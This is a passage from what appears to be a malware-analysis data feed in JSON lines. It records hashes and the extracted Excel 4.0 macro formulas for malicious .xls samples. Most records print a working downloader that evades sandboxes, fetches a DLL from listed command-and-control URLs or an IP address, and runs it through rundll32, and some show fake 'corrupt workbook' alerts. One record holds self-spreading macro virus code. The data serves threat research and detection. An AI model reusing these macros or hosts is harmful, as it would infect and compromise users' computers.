corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s6YYuzZWSU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"942f1e9541fe853e68f090bbab5326a0c0e44da5ac99400fd5acafcb17a70bfc"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"942f1e9541fe853e68f090bbab5326a0c0e44da5ac99400fd5acafcb17a70bfc","filesize":167936,"md5":"27ce23c23407caf8e5251ca1ad84afa7","sha1":"02d179df4ab847693cbf851109a66a7c453f1dd7","sha256":"942f1e9541fe853e68f090bbab5326a0c0e44da5ac99400fd5acafcb17a70bfc","sha512":"0fa9e7eef61bba9f265b5e579f5bd1f18c295e07e680fab30efee1e217e8aa12f118af94d777061261da4305c3ff1f1d98580910718cbf7205af421facdaa971","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"942f1e9541fe853e68f090bbab5326a0c0e44da5ac99400fd5acafcb17a70bfc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"19RkXhNZ7k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9461b31590d750d41507854cbc8a719ad3333b07f19f51a01908fe4780922040"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"9461b31590d750d41507854cbc8a719ad3333b07f19f51a01908fe4780922040","filesize":141824,"md5":"15ca371232c846f6d97c30266f31c30d","sha1":"8ba840e74ac4ca63863416426349efeb235068a3","sha256":"9461b31590d750d41507854cbc8a719ad3333b07f19f51a01908fe4780922040","sha512":"a32706a00f59d7e24c3c0aeadd227dff445f5adee79194a9df33ba632e0821e7888c4730d5bd071079975e6491a295bf3133e8f2514baf827177287bb89d373f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9461b31590d750d41507854cbc8a719ad3333b07f19f51a01908fe4780922040.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"qU51kmMmlx\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"946e9347572ef8dce139d71b2f182eddb79c92087e20dc67793a17e94ed2e284"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"946e9347572ef8dce139d71b2f182eddb79c92087e20dc67793a17e94ed2e284","filesize":167424,"md5":"0097263393b047359dcbe84a01cf8e19","sha1":"417c04a7f849beebd51050b14715da868a9eff99","sha256":"946e9347572ef8dce139d71b2f182eddb79c92087e20dc67793a17e94ed2e284","sha512":"aaba69cf616b9a37b83b374611f59f2455d1ff6d9474dfca53f585a99902bdb9ba946e2af06b3de21b654f658dbdd13bace53dbb34ee9ad667de93e8af085374","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"946e9347572ef8dce139d71b2f182eddb79c92087e20dc67793a17e94ed2e284.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"I4wxQZGZRe\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9472ff439fec12c28c58e15bdf7b55f2e57465d523193d173e111b033524d41b"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"9472ff439fec12c28c58e15bdf7b55f2e57465d523193d173e111b033524d41b","filesize":185344,"md5":"07890fcf5f9a2d291c53d427f4817db6","sha1":"352d428e73a03531c8400ff446a94218fb83791d","sha256":"9472ff439fec12c28c58e15bdf7b55f2e57465d523193d173e111b033524d41b","sha512":"16ff4734daf99a2bb761dede9ce25011afe34c63a7ce84d4a01aca68aab7cdd94dbe782723cc642682bf8d5c933dbd5602a87d3150d7f99fcdf28a8d0a92d17d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9472ff439fec12c28c58e15bdf7b55f2e57465d523193d173e111b033524d41b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"949189fe8b301f8954f482da188e2a0684451607f61289c9292a8b106d7a359e"},"analysis":{"reported":"2020-04-09T16:17:46Z","score":10},"files":[{"filename":"949189fe8b301f8954f482da188e2a0684451607f61289c9292a8b106d7a359e","filesize":103941,"md5":"1ff07eb49fd59e33d86eed35ad20fc23","sha1":"81bde2b940dc645350e14737083fe6ee7207a109","sha256":"949189fe8b301f8954f482da188e2a0684451607f61289c9292a8b106d7a359e","sha512":"a7c3336517de2353d03171e720189918c23ef379519d988fbdd319463d4cc3b51795799375c797569896e8b1236257ba92e6dab63c2c50ef5721991563bd253b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"949189fe8b301f8954f482da188e2a0684451607f61289c9292a8b106d7a359e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9493ffb6e4237aa273dca3457eb0ae2d3e4e9f3c8ac4f7ff3f9866de1f88b7d8"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"9493ffb6e4237aa273dca3457eb0ae2d3e4e9f3c8ac4f7ff3f9866de1f88b7d8","filesize":167936,"md5":"c9ffd788030471ddc2ea90fa9c351bf6","sha1":"ff7b502ada62ed7a8fcedb4690e410669d871bb2","sha256":"9493ffb6e4237aa273dca3457eb0ae2d3e4e9f3c8ac4f7ff3f9866de1f88b7d8","sha512":"451d0ef0516f0762a9d91e7a103d6248274e6aac1172e0ade474495010ec07b543b6fb37421ec6b2c8e3bc28be67fcd6dee2d957b7d73493473ee0e39f3b7f02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9493ffb6e4237aa273dca3457eb0ae2d3e4e9f3c8ac4f7ff3f9866de1f88b7d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"w3ja4EZgrx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"949f9f14f008a5f6da2d4193572139326d5eab82598004b481faf4393460dc73"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"949f9f14f008a5f6da2d4193572139326d5eab82598004b481faf4393460dc73","filesize":185344,"md5":"2d4988aa6a122f177fba5f8bd97ca6bb","sha1":"729c1312e2fb8c619fdd5ced7d05e24ccaf0cc51","sha256":"949f9f14f008a5f6da2d4193572139326d5eab82598004b481faf4393460dc73","sha512":"7724e227ea82bc72c91f55650fa027409d0f15af93bb696bfa8aabcc1d168e3103cd8d2eb78b60e907d9906002603f6394c96a3ef83ac4af2be5c74671e7c4e5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"949f9f14f008a5f6da2d4193572139326d5eab82598004b481faf4393460dc73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94abdcaaf7ce795a71a3b5ef2ed2d92ae054312a07092400f611548481761356"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94abdcaaf7ce795a71a3b5ef2ed2d92ae054312a07092400f611548481761356","filesize":167936,"md5":"9458cc54c09c8e5190b008f62cced3e6","sha1":"11b35f5473c29996f8343627a05f03ba07489aa1","sha256":"94abdcaaf7ce795a71a3b5ef2ed2d92ae054312a07092400f611548481761356","sha512":"59e5028ce5f23e44cd84a3a02b97f028e20a1c3768a7929fd95533664ef53c088daa3d139c5417bdb972b838ee44e8b30fe3a56fddac0a1608601e4dfbc01a8d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94abdcaaf7ce795a71a3b5ef2ed2d92ae054312a07092400f611548481761356.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PsNO2tbudV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53","filesize":125952,"md5":"04597dfeed0343bcef0e4f03346c030b","sha1":"7414fc8e27876d80f1ef94bf7ed5a9f2deac4440","sha256":"94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53","sha512":"4251ad2ccfd99efe3c85c8afe786f9de2013b82002f88d55f0d8d17b2253aa37ef71b7fa16fb2fd883512c86bfb0a107ff0db9fb2bdb137db094500c3518057a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)\nALERT(\"\",2)\nRETURN()\nRETURN()\nNEW(1)\nWORKBOOK.INSERT(1)\nWORKBOOK.INSERT(1)\nACTIVATE.PREV()\nWORKBOOK.COPY(\"XL4Poppy\",\"Xl0000122.xls\")\nWORKBOOK.NAME(\"Sheet3\",\"Sheet99\")\nWORKBOOK.NAME(\"Sheet1\",\"Sheet3\")\nWORKBOOK.NAME(\"Sheet99\",\"Sheet1\")\nPROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)\nWORKBOOK.PREV()\nWORKBOOK.PREV()\nWORKBOOK.PREV()\nSAVE.AS(\"C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.\")\nFILE.CLOSE()\nRETURN()\nWORKBOOK.HIDE(\"XL4Poppy\")\nRETURN()\nERROR(FALSE)\nON.TIME(\"6:30:00 PM\",\"Hello\")\nON.TIME(\"6:30:00 AM\",\"Morning\")\nON.SHEET(,\"Poppy\",TRUE)\nRETURN()\nSET.NAME(\"Document_array\",DOCUMENTS())\nRETURN()\nRETURN()\nERROR(FALSE)\nACTIVATE.PREV()\nWORKBOOK.COPY(\"XL4Poppy\",\"Xl0000122.xls\")\nRETURN()\nAPP.TITLE(\"XF.Classic.Poppy\")\nMESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94bacfa2b06630553a47c2af22334490b393037dfc79554262b3f9be082b2fcb"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94bacfa2b06630553a47c2af22334490b393037dfc79554262b3f9be082b2fcb","filesize":116224,"md5":"12e671bc4bfcb750d9879dfa8f458ec7","sha1":"71f80c8c00764405d77c444d3807231fb578713b","sha256":"94bacfa2b06630553a47c2af22334490b393037dfc79554262b3f9be082b2fcb","sha512":"b8cde96ef6602fd8af26ddb247653a598c83b385387bc23202f184513e9b4e7b006763d7886d5b183d26f3fb9fcdb2a279295ae0de2bc48ff86e5a617e440c8f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94bacfa2b06630553a47c2af22334490b393037dfc79554262b3f9be082b2fcb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"W9PVYTMa0F\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94be28f149a0897eba4f6e6de9ef8286fb0267f689f750f40d61d3e801804d80"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94be28f149a0897eba4f6e6de9ef8286fb0267f689f750f40d61d3e801804d80","filesize":167936,"md5":"02b9ec396deb7f5486a497739e67ea96","sha1":"62f51c1f73235fa79295fd631d4d062e23072137","sha256":"94be28f149a0897eba4f6e6de9ef8286fb0267f689f750f40d61d3e801804d80","sha512":"f9f7ad94eb1944670d6b3947ad1eb30388f644fa5b80a6e243e9702b903ef1cc659b0133bc5387b6db3cf81b89f9e8466e223d30b92afcd291def3af33e25ed7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94be28f149a0897eba4f6e6de9ef8286fb0267f689f750f40d61d3e801804d80.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y6vVebG21Q\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94c222c44460cf4275f8baf5d9b9b787419efc3df3957de7c59b946351ffceb4"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94c222c44460cf4275f8baf5d9b9b787419efc3df3957de7c59b946351ffceb4","filesize":160768,"md5":"2db5ed18b87aefc987b901b6500308e5","sha1":"72047f85c0a0373ac6f90ae8ae57ab5a059fd6b1","sha256":"94c222c44460cf4275f8baf5d9b9b787419efc3df3957de7c59b946351ffceb4","sha512":"26aa97cfca2a72c46cc393bca946e7ae9e35ef3e7cd9351aa4e5180533980ac3dfd606654692eaea82f77832a313540d6f14adf7781832f1592b39ec8c0c22cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94c222c44460cf4275f8baf5d9b9b787419efc3df3957de7c59b946351ffceb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9uZP7B9PxU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94c6636f17f5a9be12d31bba0c3de8b771d267d54fc972afb5f7c7250b510f5a"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94c6636f17f5a9be12d31bba0c3de8b771d267d54fc972afb5f7c7250b510f5a","filesize":206336,"md5":"b23efbb3702d0af8b181e77c473adbbf","sha1":"80a36775b46381f3b130a54798a253c969517eb5","sha256":"94c6636f17f5a9be12d31bba0c3de8b771d267d54fc972afb5f7c7250b510f5a","sha512":"c4af089bacec2e31f4e4c6e6c65012909ba6be17442e9a6ebe6cea9f50ff6b64a0c1f6dcc0856a73a3dc1118378694914227179bccb79a3e03ba30e9be484466","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94c6636f17f5a9be12d31bba0c3de8b771d267d54fc972afb5f7c7250b510f5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"32VuKIHcbH\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94c8168bc3d5cce1d8409fe9d97f6c471316b66fa3567664e00ca9ed0be14256"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94c8168bc3d5cce1d8409fe9d97f6c471316b66fa3567664e00ca9ed0be14256","filesize":152576,"md5":"aef87ef71acda6d53597c872fbb578f2","sha1":"ba24ea6d5af1f85c10d9c29a869f408a927c49ab","sha256":"94c8168bc3d5cce1d8409fe9d97f6c471316b66fa3567664e00ca9ed0be14256","sha512":"0739edac7938cf0bfae69f7626cdcd727069453e5cff57543d4b0412e32719920654aafc48184fcafeb3f721e95fd7406029655b72eff053af07a93375a72e98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94c8168bc3d5cce1d8409fe9d97f6c471316b66fa3567664e00ca9ed0be14256.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IOc22N86Cs\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94ccd456b4110a6617fbfeb220b45be605ab4d449cf83ee0a3ade4f6a0ca3b4b"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94ccd456b4110a6617fbfeb220b45be605ab4d449cf83ee0a3ade4f6a0ca3b4b","filesize":104448,"md5":"9c33cb768fad0febd7ee899df22ce06b","sha1":"c9423a502ba2227b0018c3b858bb247b1d7c6b4d","sha256":"94ccd456b4110a6617fbfeb220b45be605ab4d449cf83ee0a3ade4f6a0ca3b4b","sha512":"4c6a6148f3a92d81c479ab0c7a62091fa7cdadf67eb2e84be08f1827ea06fb462dfcd82a2cee23d325b64c43a6c036be4a8c3616b14d07b7a1efd4a4063c8981","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94ccd456b4110a6617fbfeb220b45be605ab4d449cf83ee0a3ade4f6a0ca3b4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TdAPlndjt7\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94d8212b8c8f5571dcd25bdd6196da890016380a17863bd2d503ffc1c731d86c"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94d8212b8c8f5571dcd25bdd6196da890016380a17863bd2d503ffc1c731d86c","filesize":206336,"md5":"90e1ed726d4004c436cf360222709af9","sha1":"2f8c8619cb9c8e7686ec352a3074ccc89dccfe66","sha256":"94d8212b8c8f5571dcd25bdd6196da890016380a17863bd2d503ffc1c731d86c","sha512":"40211d1d25d6b13a78a8178029ee5981909bfd6f9039707c5d038c243b11b6ea9528c46b6c8c6babeb7e63ce0c657ea74a011629715630afe8685b1facf027a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94d8212b8c8f5571dcd25bdd6196da890016380a17863bd2d503ffc1c731d86c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 